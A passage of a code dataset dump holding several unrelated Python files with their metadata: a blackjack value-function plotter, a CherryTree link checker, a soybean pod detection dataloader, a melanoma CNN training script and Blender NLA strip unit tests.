"thelynchlab/adversarial", "sub_path": "classify.py", "file_name": "classify.py", "file_ext": "py", "file_size_in_byte": 20437, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PIL.ImageFile.LOAD_TRUNCATED_IMAGES", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PIL.ImageFile", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 59, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 67, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 101, "usage_type": "call"}, {"api_name": "json.load", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 129, "usage_type": "call"}, {"api_name": "torchvision.models.resnet18", "line_number": 150, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 153, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 153, "usage_type": "name"}, {"api_name": "torchvision.models.alexnet", "line_number": 160, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torchvision.models.vgg19", "line_number": 170, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 173, "usage_type": "name"}, {"api_name": "torchvision.models.squeezenet1_0", "line_number": 180, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 180, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 182, "usage_type": "name"}, {"api_name": "torchvision.models.densenet121", "line_number": 190, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 190, 
"usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 193, "usage_type": "name"}, {"api_name": "torchvision.models.inception_v3", "line_number": 200, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 200, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 207, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 218, "usage_type": "call"}, {"api_name": "time.time", "line_number": 224, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.set_grad_enabled", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 280, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 294, "usage_type": "call"}, {"api_name": "time.time", "line_number": 301, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 312, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 312, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 313, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 313, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 314, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 314, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomVerticalFlip", "line_number": 315, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 315, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomRotation", "line_number": 316, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 316, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 317, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 317, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 318, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 318, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 320, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 320, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 322, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 322, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 323, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 323, "usage_type": "name"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 324, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 324, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 325, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 325, "usage_type": "name"}, {"api_name": 
"torchvision.transforms.Normalize", "line_number": 327, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 327, "usage_type": "name"}, {"api_name": "torchvision.datasets.ImageFolder", "line_number": 334, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 334, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 334, "usage_type": "call"}, {"api_name": "os.path", "line_number": 334, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 337, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 337, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 380, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 380, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 383, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 383, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 424, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 459, "usage_type": "call"}, {"api_name": "common.image_loader", "line_number": 460, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 462, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 487, "usage_type": "call"}, {"api_name": "os.path", "line_number": 487, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 487, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 488, "usage_type": "call"}, {"api_name": "os.path", "line_number": 488, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 488, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 500, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 508, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 518, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 519, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 522, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 532, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 534, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 534, "usage_type": "name"}, {"api_name": "pylab.pcolor", "line_number": 544, "usage_type": "call"}, {"api_name": "pylab.axis", "line_number": 545, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 546, "usage_type": "call"}, {"api_name": "pylab.savefig", "line_number": 547, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 557, "usage_type": "call"}]} +{"seq_id": "10140061442", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter, MultipleLocator\n\ndef plot(val, name=None):\n nx, ny = 10, 31\n x = range(nx)\n for i in range(4):\n y = range(-30,ny)\n hf = plt.figure()\n ha = hf.add_subplot(111, projection='3d')\n plt.xticks(x, range(1,nx+1))\n plt.xlabel('Dealer Card')\n plt.ylabel('Player Sum')\n ha.set_zlabel('Value Function')\n # ha.yaxis.set_major_locator(ticker.MultipleLocator(5))\n X, Y = np.meshgrid(x, y) \n # ha.plot_wireframe(X, Y, val[i,0:ny+10*i,:], color='black')\n # ha.plot_surface(X, Y, val[i,0:ny+10*i,:],cmap=cm.coolwarm)\n Z = val[:,i,:]\n ha.plot_wireframe(X, Y, Z, color='black')\n 
ha.plot_surface(X, Y, Z,cmap=cm.coolwarm)\n        ha.set_title('Surface plot for Trump cards = ' + str(i));\n        ha.view_init(elev=25, azim=-7)\n        if name:\n            hf.savefig(name+'-'+str(i)+'.png')\n    if not name:\n        plt.show()\n\n# import matplotlib.pyplot as plt\n# from matplotlib import cm\n# from matplotlib.ticker import LinearLocator, FormatStrFormatter\n\n# fig = plt.figure()\n# ax = fig.gca(projection='3d')\n\n# # Make data.\n# X = np.arange(-30, 31, 1)\n# Y = np.arange(0, 10, 1)\n# Y, X = np.meshgrid(Y, X)\n# # R = np.sqrt(X**2 + Y**2)\n# # Z = np.sin(R)\n# Z = v[:,3,:]\n\n# # Plot the surface.\n# # surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,linewidth=0, antialiased=False)\n# surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1,cmap='viridis', edgecolor='none')\n# # ax.view_init(elev=25, azim=-7)\n\n# # Customize the z axis.\n# ax.set_zlim(-1, 1)\n# ax.zaxis.set_major_locator(LinearLocator(10))\n# ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n# # Add a color bar which maps values to colors.\n# fig.colorbar(surf, shrink=0.5, aspect=5)\n\n# plt.show()", "repo_name": "samarthaggarwal/BlackJack-CardGame", "sub_path": "plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 1932, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.cm.coolwarm", "line_number": 24, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "20003998287", "text": "import sys\nimport os\nimport plac\nfrom pathlib import Path\nimport yaml\nimport pandas as pd\n\nsys.path.append('/home/jeremy/Library')\n\nfrom storage.cherrytree_xml import CherryTree\nfrom utility.config import load_config\n\ndef main(config, output='csv'):\n    \"\"\"Match files in target directory with nodes containing file link\n    config fields: content_index, content_base_name, content_file_dir\n    output: html or csv\n    \"\"\"\n    try:\n        c = load_config(config)\n    except:\n        exit()\n    cpath = Path(config).with_suffix('.yaml')\n    if not cpath.exists():\n        print('no config file found')\n        exit()\n    cf = yaml.load(cpath.read_text())\n\n    ct = CherryTree(cf['content_index'])\n\n    cbn = cf['content_base_name']\n    cfd = cf['content_file_dir']\n\n    content_base_node = ct.find_node_by_name(cbn)\n\n    if not content_base_node:\n        print(f' {cbn} not in index')\n        exit()\n\n    file_links = set([l.filepath.stem \\\n                      for n in content_base_node.descendants \\\n                      for l in n.links \\\n                      if l.filepath\n                      if cfd in str(l.filepath)\n                      ])\n\n    file_paths = set([f.stem \\\n                      for f in Path(cfd).iterdir() \\\n                      if f.suffix == '.md'])\n\n    unmatched = [(f, None) for f 
in file_paths.difference(file_links)]\n    unmatched.extend([(None, l) for l in file_links.difference(file_paths)])\n\n\n    df = pd.DataFrame(unmatched, columns=['File', 'Link']).drop_duplicates().sort_values(['Link', 'File'])\n\n\n    if output == 'csv':\n        print(df.to_csv(sep=' ', index=False, header=False))\n\n    elif output == 'html':\n        print(df.to_html())\n    else:\n        print(f'unknown format {output}')\n\n\nif __name__ == '__main__':\n    plac.call(main)\n", "repo_name": "jallanxjallan/scripts", "sub_path": "match_nodes_and_files.py", "file_name": "match_nodes_and_files.py", "file_ext": "py", "file_size_in_byte": 1762, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "utility.config.load_config", "line_number": 19, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 26, "usage_type": "call"}, {"api_name": "storage.cherrytree_xml.CherryTree", "line_number": 28, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 54, "usage_type": "call"}, {"api_name": "plac.call", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "17777482603", "text": "# General imports\nimport os\nimport datetime\nimport numpy as np\nimport random\nimport json\n\nimport yaml\nimport cv2\nfrom PIL import Image\nimport argparse\nimport pathlib as pt\nimport re\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n# Importing support packages\nimport pandas as pd\nfrom skimage import io, transform\n\nimport torch\nfrom torch import nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\n# Importing torch vision model\nimport torchvision\nimport torchvision.models as models\nfrom torchvision import transforms, utils\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\n\npod_data_path = pt.Path(r'D:\\Machine Learning\\Challenge\\SoyBeanPodCount\\Data\\Dev_Phase\\training\\pod_annotations')\n\npod_annotations = pod_data_path / r'pod_detection_annotations.csv'\npod_dataset = pod_data_path / 'dataset'\n\n# Hardcoded variables\ndisplay_limit = 5\n\n\nclass SoyPodDataset(Dataset):\n    \"\"\"Soybean pod detection dataset.\"\"\"\n\n    def __init__(self, csv_file, root_dir, transform_d=None):\n        \"\"\"\n        Args:\n            csv_file (string): Path to the csv file with annotations.\n            root_dir (string): Directory with all the images.\n            transform_d (callable, optional): Optional transform to be applied\n                on a sample.\n        \"\"\"\n        self.soypod_frame = pd.read_csv(csv_file)\n        self.root_dir = pt.Path(root_dir)\n        self.transform = transform_d\n\n    def __len__(self):\n        return len(self.soypod_frame)\n\n    def __getitem__(self, idx):\n        if torch.is_tensor(idx):\n            idx = idx.tolist()\n\n        img_name = self.root_dir / self.soypod_frame['filename'][idx]\n        image = io.imread(img_name)\n        bounds_str = self.soypod_frame['region_shape_attributes'][idx].replace('\"\"', '\"')\n        label_data = re.sub(r'\\W', '', self.soypod_frame['region_attributes'][idx])\n        bounds = json.loads(bounds_str)\n        sample = {'image': image, 'label': label_data}\n        sample.update(bounds)\n\n        if self.transform:\n            sample = self.transform(sample)\n        return sample\n\n\nsoy_dataset = SoyPodDataset(csv_file=pod_annotations, root_dir=pod_dataset, 
transform_d=None)\n\nfig = plt.figure()\n\nfor i in range(len(soy_dataset)):\n sample = soy_dataset[i]\n\n rect = patches.Rectangle((sample['x'], sample['y']), sample['width'], sample['height'], linewidth=1, edgecolor='r',\n facecolor='none')\n ax = plt.subplot(1, display_limit, i + 1)\n plt.tight_layout()\n ax.set_title(f\"Sample #{i + 1}\\n Label: {sample['label']}\")\n ax.axis('off')\n ax.imshow(sample['image'])\n ax.add_patch(rect)\n\n if i == display_limit-1:\n plt.show()\n break\n\nmodel = torchvision.models.detection.fasterrcnn_resnet50_fpn(weights=\"DEFAULT\")\n\ndataloader = DataLoader(soy_dataset, batch_size=4,\n shuffle=True, num_workers=0)\n\n\n# Helper function to show a batch\ndef show_landmarks_batch(sample_batched):\n \"\"\"Show image with landmarks for a batch of samples.\"\"\"\n images_batch, soy_batch = \\\n sample_batched['image'], sample_batched['label']\n x, y, w, h = sample_batched['x'],sample_batched['y'], sample_batched['width'], sample_batched['height']\n batch_size = len(images_batch)\n im_size = images_batch.size(2)\n grid_border_size = 2\n\n grid = utils.make_grid(images_batch)\n plt.imshow(grid)\n\n # for i in range(batch_size):\n # rect = patches.Rectangle((sample['x'], sample['y']), sample['width'], sample['height'], linewidth=1,\n # edgecolor='r',\n # facecolor='none')\n\n plt.title('Batch from dataloader')\n\n\nfor i_batch, sample_batched in enumerate(dataloader):\n # print(i_batch, sample_batched['image'].size())\n\n # observe 4th batch and stop.\n if i_batch == 3:\n plt.figure()\n show_landmarks_batch(sample_batched)\n plt.axis('off')\n plt.ioff()\n plt.show()\n break\n", "repo_name": "jiztom/SoyBeanPodCount", "sub_path": "Test/Dataloader.py", "file_name": "Dataloader.py", "file_ext": "py", "file_size_in_byte": 4022, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 42, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 53, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 61, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 65, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 65, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 67, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "torchvision.models.detection.fasterrcnn_resnet50_fpn", "line_number": 97, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 97, "usage_type": "attribute"}, 
{"api_name": "torch.utils.data.DataLoader", "line_number": 99, "usage_type": "call"}, {"api_name": "torchvision.utils.make_grid", "line_number": 113, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ioff", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}]} +{"seq_id": "42269924597", "text": "\"\"\"Conv Nets training script.\"\"\"\nimport click\nimport yaml\nimport pickle as pkl\n\nimport sys\nsys.path.insert(0, 'src/utils/')\nsys.path.insert(0, 'src/configs/')\n\nimport data\nimport util\nimport nn\n\nimport numpy as np\nnp.random.seed(9)\n\n@click.command()\n@click.option('--cnf', default='configs/vgg_224.py', show_default=True,\n help='Path or name of configuration module.')\n@click.option('--weights_from', default=None, show_default=True,\n help='Path to initial weights file.')\n@click.option('--exp_run_folder', default=None, show_default=True,\n help=\"Path to running experiment folder.\")\n@click.option('--train_retina', default=None, show_default=True,\n help=\"Flag to train retina.\")\n@click.option('--fold', default='1x1', show_default=True,\n help=\"Specify the step of the 5x2-fold cross-validation (ex.: 1x1, 1x2, ..., 5x2).\")\n\ndef main(cnf, weights_from, fold, exp_run_folder, train_retina):\n config = util.load_module(cnf).config\n config.cnf['fold'] = fold # <-- used to change the directories for weights_best, weights_epoch and weights_final\n config.cnf['exp_run_folder'] = exp_run_folder\n protocol = data.settings['protocol']\n\n if train_retina != 'train_retina':\n folds = yaml.load(open('folds/'+protocol+'.yml'))\n f0, f1 = fold.split('x')\n train_list = folds['Fold_' + f0][int(f1)-1]\n files = data.get_image_files(config.get('train_dir'), train_list)\n else:\n files = data.get_image_files(config.get('train_dir'))\n\n if weights_from is None:\n weights_from = config.weights_file\n else:\n weights_from = str(weights_from)\n\n names = data.get_names(files)\n labels = data.get_labels(names, label_file='folds/'+protocol+'.csv').astype(np.int32)\n net = nn.create_net(config)\n\n try:\n net.load_params_from(weights_from)\n print(\"loaded weights from {}\".format(weights_from))\n except IOError:\n print(\"couldn't load weights, starting from scratch\")\n\n\n #Print layerinfo\n print(\"## Layer information\")\n import nolearn\n layer_info = nolearn.lasagne.PrintLayerInfo()\n print(layer_info._get_greeting(net))\n layer_info, legend = layer_info._get_layer_info_conv(net)\n print(layer_info)\n print(legend)\n print(\"fitting ...\")\n net.fit(files, labels)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "learningtitans/melanoma-transfer", 
"sub_path": "src/train_nn.py", "file_name": "train_nn.py", "file_ext": "py", "file_size_in_byte": 2397, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.insert", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 15, "usage_type": "attribute"}, {"api_name": "util.load_module", "line_number": 30, "usage_type": "call"}, {"api_name": "data.settings", "line_number": 33, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 36, "usage_type": "call"}, {"api_name": "data.get_image_files", "line_number": 39, "usage_type": "call"}, {"api_name": "data.get_image_files", "line_number": 41, "usage_type": "call"}, {"api_name": "data.get_names", "line_number": 48, "usage_type": "call"}, {"api_name": "data.get_labels", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "nn.create_net", "line_number": 50, "usage_type": "call"}, {"api_name": "nolearn.lasagne.PrintLayerInfo", "line_number": 62, "usage_type": "call"}, {"api_name": "nolearn.lasagne", "line_number": 62, "usage_type": "attribute"}, {"api_name": "click.command", "line_number": 17, "usage_type": "call"}, {"api_name": "click.option", "line_number": 18, "usage_type": "call"}, {"api_name": "click.option", "line_number": 20, "usage_type": "call"}, {"api_name": "click.option", "line_number": 22, "usage_type": "call"}, {"api_name": "click.option", "line_number": 24, "usage_type": "call"}, {"api_name": "click.option", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "15879171119", "text": "import bpy\nimport sys\nimport unittest\n\n\nclass AbstractNlaStripTest(unittest.TestCase):\n \"\"\" Sets up a series of strips in one NLA track. \"\"\"\n\n test_object: bpy.types.Object = None\n \"\"\" Object whose X Location is animated to check strip evaluation. \"\"\"\n\n nla_tracks: bpy.types.NlaTracks = None\n \"\"\" NLA tracks of the test object, which are cleared after each test case. \"\"\"\n\n action: bpy.types.Action = None\n \"\"\" Action with X Location keyed on frames 1 to 4 with the same value as the frame, with constant interpolation. \"\"\"\n\n @classmethod\n def setUpClass(cls):\n bpy.ops.wm.read_factory_settings(use_empty=True)\n\n cls.test_object = bpy.data.objects.new(name=\"Object\", object_data=bpy.data.meshes.new(\"Mesh\"))\n bpy.context.collection.objects.link(cls.test_object)\n cls.test_object.animation_data_create()\n\n cls.nla_tracks = cls.test_object.animation_data.nla_tracks\n\n cls.action = bpy.data.actions.new(name=\"ObjectAction\")\n x_location_fcurve = cls.action.fcurves.new(data_path=\"location\", index=0, action_group=\"Object Transforms\")\n for frame in range(1, 5):\n x_location_fcurve.keyframe_points.insert(frame, value=frame).interpolation = \"CONSTANT\"\n\n def tearDown(self):\n while len(self.nla_tracks):\n self.nla_tracks.remove(self.nla_tracks[0])\n\n def add_strip_no_extrapolation(self, nla_track: bpy.types.NlaTrack, start: int) -> bpy.types.NlaStrip:\n \"\"\" Places a new strip with the test action on the given track, setting extrapolation to nothing. 
\"\"\"\n strip = nla_track.strips.new(\"ObjectAction\", start, self.action)\n strip.extrapolation = \"NOTHING\"\n return strip\n\n def assertFrameValue(self, frame: float, expected_value: float):\n \"\"\" Checks the evaluated X Location at the given frame. \"\"\"\n int_frame, subframe = divmod(frame, 1)\n bpy.context.scene.frame_set(frame=int(int_frame), subframe=subframe)\n self.assertEqual(expected_value, self.test_object.evaluated_get(\n bpy.context.evaluated_depsgraph_get()\n ).matrix_world.translation[0])\n\n\nclass NlaStripSingleTest(AbstractNlaStripTest):\n \"\"\" Tests the inner values as well as the boundaries of one strip on one track. \"\"\"\n\n def test_extrapolation_nothing(self):\n \"\"\" Tests one strip with no extrapolation. \"\"\"\n self.add_strip_no_extrapolation(self.nla_tracks.new(), 1)\n\n self.assertFrameValue(0.9, 0.0)\n self.assertFrameValue(1.0, 1.0)\n self.assertFrameValue(1.1, 1.0)\n self.assertFrameValue(3.9, 3.0)\n self.assertFrameValue(4.0, 4.0)\n self.assertFrameValue(4.1, 0.0)\n\n\nclass NlaStripBoundaryTest(AbstractNlaStripTest):\n \"\"\" Tests two strips, the second one starting when the first one ends. \"\"\"\n\n # Incorrectly, the first strip is currently evaluated at the boundary between two adjacent strips (see #113487).\n @unittest.expectedFailure\n def test_adjacent(self):\n \"\"\" The second strip should be evaluated at the boundary between two adjacent strips. \"\"\"\n nla_track = self.nla_tracks.new()\n self.add_strip_no_extrapolation(nla_track, 1)\n self.add_strip_no_extrapolation(nla_track, 4)\n\n self.assertFrameValue(3.9, 3.0)\n self.assertFrameValue(4.0, 1.0)\n self.assertFrameValue(4.1, 1.0)\n\n def test_adjacent_muted(self):\n \"\"\" The first strip should be evaluated at the boundary if it is adjacent to a muted strip. \"\"\"\n nla_track = self.nla_tracks.new()\n self.add_strip_no_extrapolation(nla_track, 1)\n self.add_strip_no_extrapolation(nla_track, 4).mute = True\n\n self.assertFrameValue(3.9, 3.0)\n self.assertFrameValue(4.0, 4.0)\n self.assertFrameValue(4.1, 0.0)\n\n def test_first_above_second(self):\n \"\"\" The first strip should be evaluated at the boundary, when followed by another strip on a track below. \"\"\"\n self.add_strip_no_extrapolation(self.nla_tracks.new(), 4)\n self.add_strip_no_extrapolation(self.nla_tracks.new(), 1)\n\n self.assertFrameValue(3.9, 3.0)\n self.assertFrameValue(4.0, 4.0)\n self.assertFrameValue(4.1, 1.0)\n\n def test_second_above_first(self):\n \"\"\" The second strip should be evaluated at the boundary, when preceded by another strip on a track below. \"\"\"\n self.add_strip_no_extrapolation(self.nla_tracks.new(), 1)\n self.add_strip_no_extrapolation(self.nla_tracks.new(), 4)\n\n self.assertFrameValue(3.9, 3.0)\n self.assertFrameValue(4.0, 1.0)\n self.assertFrameValue(4.1, 1.0)\n\n\nif __name__ == \"__main__\":\n # Drop all arguments before \"--\", or everything if the delimiter is absent. 
